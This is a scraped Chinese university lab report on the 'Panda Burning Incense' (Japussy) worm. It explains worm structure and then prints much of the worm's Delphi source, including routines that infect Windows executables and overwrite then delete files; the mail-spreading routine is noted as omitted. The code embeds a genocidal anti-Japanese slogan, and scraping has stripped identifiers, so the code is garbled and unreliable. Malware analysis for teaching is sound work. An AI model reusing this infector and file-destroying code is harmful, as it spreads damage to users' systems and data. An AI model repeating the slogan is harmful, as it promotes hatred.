信息安全-熊猫烧香病毒剖析.doc
《信息安全-熊猫烧香病毒剖析.doc》由会员分享,可在线阅读,更多相关《信息安全-熊猫烧香病毒剖析.doc(49页珍藏版)》请在咨信网上搜索。
1、网络攻击与防御实验报告计算机科学与技术学院计算机系网络教研室制课程名称:信息安全原理与实践实验名称:熊猫烧香病毒剖析实验成绩:实验报告撰写要求实验操作是教学过程中理论联系实际的重要环节,而实验报告的撰写又是知识系统化的吸收和升华过程,因此,实验报告应该体现完整性、规范性、正确性、有效性。现将实验报告撰写的有关内容说明如下:1、实验报告模板为电子版。2、下载统一的实验报告模板,学生自行完成撰写和打印。报告的首页包含本次实验的一般信息:l l组 号:例如:2-5 表示第二班第5组。l l实验日期:例如:05-10-06 表示本次实验日期。(年-月-日)l l实验编号:例如:No.1 表示第一个实验
2、。l l实验时间:例如:2学时 表示本次实验所用的时间。实验报告正文部分,从六个方面(目的、内容、步骤等)反映本次实验的要点、要求以及完成过程等情况。模板已为实验报告正文设定统一格式,学生只需在相应项内填充即可。续页不再需要包含首页中的实验一般信息。3、实验报告正文部分具体要求如下:一、实验目的本次实验所涉及并要求掌握的知识点。二、实验环境实验所使用的设备名称及规格,网络管理工具简介、版本等。三、实验内容与实验要求实验内容、原理分析及具体实验要求。四、实验过程与分析根据具体实验,记录、整理相应命令、运行结果等,包括截图和文字说明。详细记录在实验过程中发生的故障和问题,并进行故障分析,说明故障排
3、除的过程及方法。五、实验结果总结对实验结果进行分析,完成思考题目,总结实验的心得体会,并提出实验的改进意见。六、附录 信息安全 熊猫烧香病毒剖析一、实验目的1)掌握熊猫烧香病毒的工作原理和感染方法;2)掌握手工清除熊猫病毒的基本方法。二、实验环境目标主机为windows-2003所用到的工具o Wsyscheck三、实验内容与实验要求蠕虫原理1)蠕虫定义 2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者网络共享进行传播,最终破坏用户的大部分重要数据。 蠕虫病毒是自包含的程序(或是一
4、套程序),它能传播它自身功能的拷贝或它的某些部分到其他的计算机系统中(通常是经过网络连接)。 请注意,与一般病毒不同,蠕虫不需要将其自身附着到宿主程序,有两种类型的蠕虫:主机蠕虫与网络蠕虫。主计算机蠕虫完全包含在它们运行的计算机中,并且使 用网络的连接仅将自身拷贝到其他的计算机中,主计算机蠕虫在将其自身的拷贝加入到另外的主机后,就会终止它自身(因此在任意给定的时刻,只有一个蠕虫的拷 贝运行),这种蠕虫有时也叫野兔。 蠕虫一般不采取利用pe格式插入文件的方法,而是复制自身在互联网环境下进行传播,病毒的传染能力主要是针对计算机内的文件系统而言,而蠕虫病毒的传染目 标是互联网内的所有计算机。局域网条
5、件下的共享文件夹,电子邮件email,网络中的恶意网页,大量存在着漏洞的服务器等都成为蠕虫传播的良好途径。 蠕虫和传统病毒的区别: 传统病毒主要攻击的是文件系统,在其传染的过程中,计算机使用者是传染的触发者,是传染的关键环节,使用者计算机知识水平的高低常常决定了传统病毒所能造成的破坏程度; 蠕虫主要是利用计算机系统漏洞进行传染,在搜索到网络中存在漏洞的计算机后,主动进行攻击。在传染的过程中,与计算机操作者是否进行操作无关,从而与使用者的计算机知识水平无关。2)蠕虫的基本程序结构 传播模块:负责蠕虫的传播,通过检查主机或远程计算机的地址库,找到可进一步传染的其他计算机。 隐藏模块:侵入主机后,隐
6、藏蠕虫程序,防止被用户发现。 目的功能模块:实现对计算机的控制、监视或破坏等功能。 传播模块由可以分为三个基本模块:扫描模块、攻击模块和复制模块。蠕虫程序功能模型也可以扩展为如下的形式:3)蠕虫程序的一般传播过程 扫描:由蠕虫的扫描功能模块负责探测存在漏洞的主机。当程序向某个主机发送探测漏洞的信息并收到成功的反馈信息后,就得到一个可传播的对象。 攻击:攻击模块按漏洞攻击步骤自动攻击步骤1中找到的对象,取得该主机的权限(一般为管理员权限),获得一个shell。 复制:复制模块通过原主机和新主机的交互将蠕虫程序复制到新主机并启动。 蠕虫将自身复制到某台计算机之前,也会试图判断该计算机以前是都已被感
7、染过。在分布式系统中,蠕虫可能会以系统程序名或不易被操作系统察觉的名字来为自己 命名,从而伪装自己。同时,我们也可以看到,传播模块实现的实际上是自动入侵的功能。所以蠕虫的传播技术是蠕虫技术的首要技术,没有蠕虫的传播技术,也就 谈不上什么蠕虫技术了。“熊猫烧香”蠕虫病毒1)“熊猫烧香”档案 又名:尼亚姆、武汉男生、worm.whBoy、worm.nimaya 后又化身为:“金猪报喜” 病毒类型:蠕虫病毒 影响系统:Windows 9X/ME/NT/2000/XP/2003/Vista/72)“熊猫烧香”病毒特点 2006年底,我国互联网上大规模爆发“熊猫烧香”病毒及其变种,该病毒通过多种方式进行
8、传播,同时该病毒还具有盗取用户游戏账号、QQ账号等功能。该病 毒传播速度快,危害范围广,截至案发为止,已有上百万个人用户、网吧及企业局域网用户遭受感染和破坏,引起社会各界高度关注。瑞星2006安全报告将 其列为十大病毒之首,在2006年度中国计算机病毒疫情和互联网安全报告的十大病毒排行中一举成为“毒王”。 “熊猫烧香”,是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会 删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改
9、成熊猫举着三根香的模样。“熊猫烧香”源码分析 含有病毒体的文件被运行后,病毒将自身复制至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个 Autorun.inf文件,使得用户打开该磁盘时激活病毒体。随后病毒体创建一个线程进行本地文件感染,同时创建另外一个线程连接网站下载DOS程序发 动恶意攻击。 下面,我们分析一下用delphi语言描述的“熊猫烧香”的主要源代码:program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI, Registry;constHeaderSize
10、 = 82432; /病毒体的大小IconOffset = $12EB8; /PE文件主图标的偏移量/查找2800000020的十六进制字符串可以找到主图/标的偏移量HeaderSize = 38912; /Upx压缩过病毒体的大小IconOffset = $92BC; /Upx压缩过PE文件主图标的偏移量/Upx 1.24W 用法: upx -9 -8086 Japussy.exeIconSize = $2E8; /PE文件主图标的大小-744字节IconTail = IconOffset + IconSize; /PE文件主图标的尾部ID = $44444444; /感染标记/垃圾码,以备
11、写入Catchword = If a race need to be killed out, it must be Yamato. +If a country need to be destroyed, it must be Japan! +* W32.Japussy.Worm.A *;$R *.RESfunction RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;stdcall; external Kernel32.dll;/函数声明varTmpFile: string;Si: STARTUPINFO;Pi: PR
12、OCESS_INFORMATION;IsJap: Boolean = False; /日文操作系统标记 =判断是否为Win9x= function IsWin9x: Boolean;varVer: TOSVersionInfo;beginResult := False;Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);if not GetVersionEx(Ver) thenExit;if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then /Win9xResult := True;end;
13、=在流之间复制= procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;dStartPos: Integer; Count: Integer);varsCurPos, dCurPos: Integer;beginsCurPos := Src.Position;dCurPos := Dst.Position;Src.Seek(sStartPos, 0);Dst.Seek(dStartPos, 0);Dst.CopyFrom(Src, Count);Src.Seek(sCurPos, 0);Dst.Seek(dCur
14、Pos, 0);end;=将宿主文件从已感染的PE文件中分离出来,以备使用= procedure Extract: string);varsStream, dStream: T;begintrysStream := T(ParamStr(0), fmOpenRead or fmShareDenyNone);trydStream := T(, fmCreate);trysStream.Seek(HeaderSize, 0); /跳过头部的病毒部分dStream.CopyFrom(sStream, sStream.Size - HeaderSize);finallydStream.Free;end
15、;finallysStream.Free;end;exceptend;end;=填充STARTUPINFO结构= procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);beginSi.cb := SizeOf(Si);Si.lpReserved := nil;Si.lpDesktop := nil;Si.lpTitle := nil;Si.dwFlags := STARTF_USESHOWWINDOW;Si.wShowWindow := State;Si.cbReserved2 := 0;Si.lpReserved2 := ni
16、l;end;=发带毒邮件= procedure SendMail; /此处省略了带危害性代码beginend;=感染PE文件= procedure InfectOne: string);varHdrStream, SrcStream: T;IcoStream, DstStream: TMemoryStream;iID: LongInt;aIcon: TIcon;Infected, IsPE: Boolean;i: Integer;Buf: array0.1 of Char;begintry/出错则文件正在被使用,退出if CompareText(, JAPUSSY.EXE) = 0 then
17、/是自己则不感染Exit;Infected := False;IsPE := False;SrcStream := T(, fmOpenRead);tryfor i := 0 to $108 do/检查PE文件头beginSrcStream.Seek(i, soFromBeginning);SrcStream.Read(Buf, 2);if (Buf0 = #80) and (Buf1 = #69) then/PE标记beginIsPE := True; /是PE文件Break;end;end;SrcStream.Seek(-4, soFromEnd);/检查感染标记SrcStream.Rea
18、d(iID, 4);if (iID = ID) or (SrcStream.Size 10240) then /太小的文件不感染Infected := True;finallySrcStream.Free;end;if Infected or (not IsPE) then /如果感染过了或不是PE文件则退出Exit;IcoStream := TMemoryStream.Create;DstStream := TMemoryStream.Create;tryaIcon := TIcon.Create;try/得到被感染文件的主图标(744字节),存入流aIcon.ReleaseHandle;a
19、Icon.Handle := ExtractIcon(HInstance, PChar(), 0);aIcon.SaveToStream(IcoStream);finallyaIcon.Free;end;SrcStream := T(, fmOpenRead);/头文件HdrStream := T(ParamStr(0), fmOpenRead or fmShareDenyNone);try/写入病毒体主图标之前的数据CopyStream(HdrStream, 0, DstStream, 0, IconOffset);/写入目前程序的主图标CopyStream(IcoStream, 22, D
20、stStream, IconOffset, IconSize);/写入病毒体主图标到病毒体尾部之间的数据CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);/写入宿主程序CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);/写入已感染的标记DstStream.Seek(0, 2);iID := $44444444;DstStream.Write(iID, 4);finallyHdrStream.Free;end;fina
21、llySrcStream.Free;IcoStream.Free;DstStream.SaveTo); /替换宿主文件DstStream.Free;end;except;end;end;=将目标文件写入垃圾码后删除=procedure Smash: string);var: Integer;i, Size, Mass, Max, Len: Integer;begintrySet(PChar(), 0);/去掉只读属性 := (, fmOpenWrite); /打开文件trySize := Get(, nil);/文件大小i := 0;Randomize;Max := Random(15); /
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 信息 安全 熊猫 烧香 病毒 剖析
1、咨信平台为文档C2C交易模式,即用户上传的文档直接被用户下载,收益归上传人(含作者)所有;本站仅是提供信息存储空间和展示预览,仅对用户上传内容的表现方式做保护处理,对上载内容不做任何修改或编辑。所展示的作品文档包括内容和图片全部来源于网络用户和作者上传投稿,我们不确定上传用户享有完全著作权,根据《信息网络传播权保护条例》,如果侵犯了您的版权、权益或隐私,请联系我们,核实后会尽快下架及时删除,并可随时和客服了解处理情况,尊重保护知识产权我们共同努力。
2、文档的总页数、文档格式和文档大小以系统显示为准(内容中显示的页数不一定正确),网站客服只以系统显示的页数、文件格式、文档大小作为仲裁依据,个别因单元格分列造成显示页码不一将协商解决,平台无法对文档的真实性、完整性、权威性、准确性、专业性及其观点立场做任何保证或承诺,下载前须认真查看,确认无误后再购买,务必慎重购买;若有违法违纪将进行移交司法处理,若涉侵权平台将进行基本处罚并下架。
3、本站所有内容均由用户上传,付费前请自行鉴别,如您付费,意味着您已接受本站规则且自行承担风险,本站不进行额外附加服务,虚拟产品一经售出概不退款(未进行购买下载可退充值款),文档一经付费(服务费)、不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
4、如你看到网页展示的文档有www.zixin.com.cn水印,是因预览和防盗链等技术需要对页面进行转换压缩成图而已,我们并不对上传的文档进行任何编辑或修改,文档下载后都不会有水印标识(原文档上传前个别存留的除外),下载后原文更清晰;试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓;PPT和DOC文档可被视为“模板”,允许上传人保留章节、目录结构的情况下删减部份的内容;PDF文档不管是原文档转换或图片扫描而得,本站不作要求视为允许,下载前自行私信或留言给上传者【天****】。
5、本文档所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用;网站提供的党政主题相关内容(国旗、国徽、党徽--等)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。
6、文档遇到问题,请及时私信或留言给本站上传会员【天****】,需本站解决可联系【 微信客服】、【 QQ客服】,若有其他问题请点击或扫码反馈【 服务填表】;文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“【 版权申诉】”(推荐),意见反馈和侵权处理邮箱:1219186828@qq.com;也可以拔打客服电话:4008-655-100;投诉/维权电话:4009-655-100。